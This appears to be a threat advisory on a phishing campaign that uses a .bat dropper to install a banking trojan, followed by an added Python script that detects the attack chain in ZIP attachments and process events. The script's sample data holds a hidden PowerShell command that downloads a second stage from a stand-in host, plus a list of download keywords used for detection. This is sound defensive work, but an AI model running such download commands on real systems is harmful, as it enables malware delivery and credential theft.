Phishing Campaign Using DOS Batch File to Distribute Malware

A SANS ISC researcher recently discovered a phishing campaign attempting to distribute a banking trojan using a DOS batch file as a dropper. Because of the way this malware spreads, the .bat file used is currently undetected by major antivirus engines. The phishing emails in this campaign carry a ZIP file attachment. When the ZIP file is opened and the 2.6 KB .bat file is extracted and run, it identifies the target system’s processor architecture and then downloads additional malware via PowerShell. The PowerShell script injects a malicious DLL into either the explorer.exe or svchost.exe process. It then collects additional information about the system, such as geolocation and any banking software installed on it, and sends that data back to the attacker over an HTTP connection. If the victim attempts to access a financial institution’s website, the banking trojan creates a screen overlay to capture the victim’s login credentials. Although this campaign is currently targeting victims in Brazil, the NJCCIC assesses with high confidence that this tactic will increasingly be used to target victims in other countries, including those within the US. The NJCCIC recommends reviewing the SANS ISC report and proactively monitoring systems and networks for the associated indicators of compromise.
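The chain described above (ZIP attachment, .bat dropper, cmd.exe spawning PowerShell to fetch a second stage, PowerShell then touching explorer.exe or svchost.exe) lends itself to two simple detection checkpoints. The script below is an added illustration written for this page; it is not code from the NJCCIC advisory or the SANS ISC report. The ZIP archive and the process-event records are constructed inline, the event field names follow a Sysmon-style process-creation and process-access layout, and the keyword list of PowerShell download primitives is an assumption chosen for illustration rather than the campaign's actual command line.

```python
"""Added detection example; not part of the NJCCIC advisory or the SANS ISC report."""
from __future__ import annotations

import io
import re
import zipfile

# Attachment members with these extensions warrant a closer look before delivery.
SCRIPT_EXTS = (".bat", ".cmd", ".ps1", ".vbs", ".js")

# PowerShell download primitives commonly seen in second-stage fetches (assumed list).
DOWNLOAD_PATTERN = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer)",
    re.IGNORECASE,
)

# Processes the advisory names as injection targets.
INJECTION_TARGETS = ("explorer.exe", "svchost.exe")


def script_members_in_zip(zip_bytes: bytes) -> list[str]:
    """Checkpoint 1: list archive members that carry a script extension."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if n.lower().endswith(SCRIPT_EXTS)]


def detect_dropper_chain(events: list[dict]) -> list[str]:
    """Checkpoint 2: flag the batch -> PowerShell -> download -> injection-target pattern.

    `events` mixes two record types (field names are an assumption):
      process_create: pid, ppid, image, cmdline
      process_access: pid, source_image, target_image
    """
    creates = {e["pid"]: e for e in events if e["type"] == "process_create"}
    findings = []
    for e in events:
        if e["type"] == "process_create":
            image = e["image"].lower()
            if not image.endswith("powershell.exe"):
                continue
            parent = creates.get(e["ppid"])
            if parent and parent["image"].lower().endswith("cmd.exe") and ".bat" in parent["cmdline"].lower():
                findings.append(f"pid {e['pid']}: powershell.exe launched by a batch file via cmd.exe")
            if DOWNLOAD_PATTERN.search(e["cmdline"]):
                findings.append(f"pid {e['pid']}: PowerShell command line contains a download primitive")
        elif e["type"] == "process_access":
            src = e["source_image"].lower()
            tgt = e["target_image"].lower()
            if src.endswith("powershell.exe") and tgt.endswith(INJECTION_TARGETS):
                findings.append(f"pid {e['pid']}: powershell.exe opened a handle to {tgt.rsplit(chr(92), 1)[-1]}")
    return findings


def build_sample_zip() -> bytes:
    """Constructed attachment: a ZIP holding a harmless placeholder .bat member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.bat", "@echo off\r\necho constructed sample\r\n")
        zf.writestr("readme.txt", "constructed sample\r\n")
    return buf.getvalue()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed event log: one suspicious chain (pids 200/300) and one benign PowerShell (pid 400).
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process_create", "pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\user\Downloads\invoice.bat"'},
    {"type": "process_create", "pid": 300, "ppid": 200, "image": PS,
     "cmdline": "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')\""},
    {"type": "process_access", "pid": 300, "source_image": PS, "target_image": r"C:\Windows\explorer.exe"},
    {"type": "process_create", "pid": 400, "ppid": 100, "image": PS, "cmdline": "powershell.exe -c Get-Date"},
]

if __name__ == "__main__":
    print("script members:", script_members_in_zip(build_sample_zip()))
    for line in detect_dropper_chain(SAMPLE_EVENTS):
        print(line)
```

Run stand-alone, the script reports the `.bat` member of the constructed attachment and three findings, all for pid 300 (batch-launched PowerShell, a download primitive in its command line, and a handle opened to explorer.exe); the interactive PowerShell session at pid 400 produces nothing. In practice the same two checks map onto a mail-gateway attachment policy and a SIEM correlation rule over process-creation and process-access telemetry.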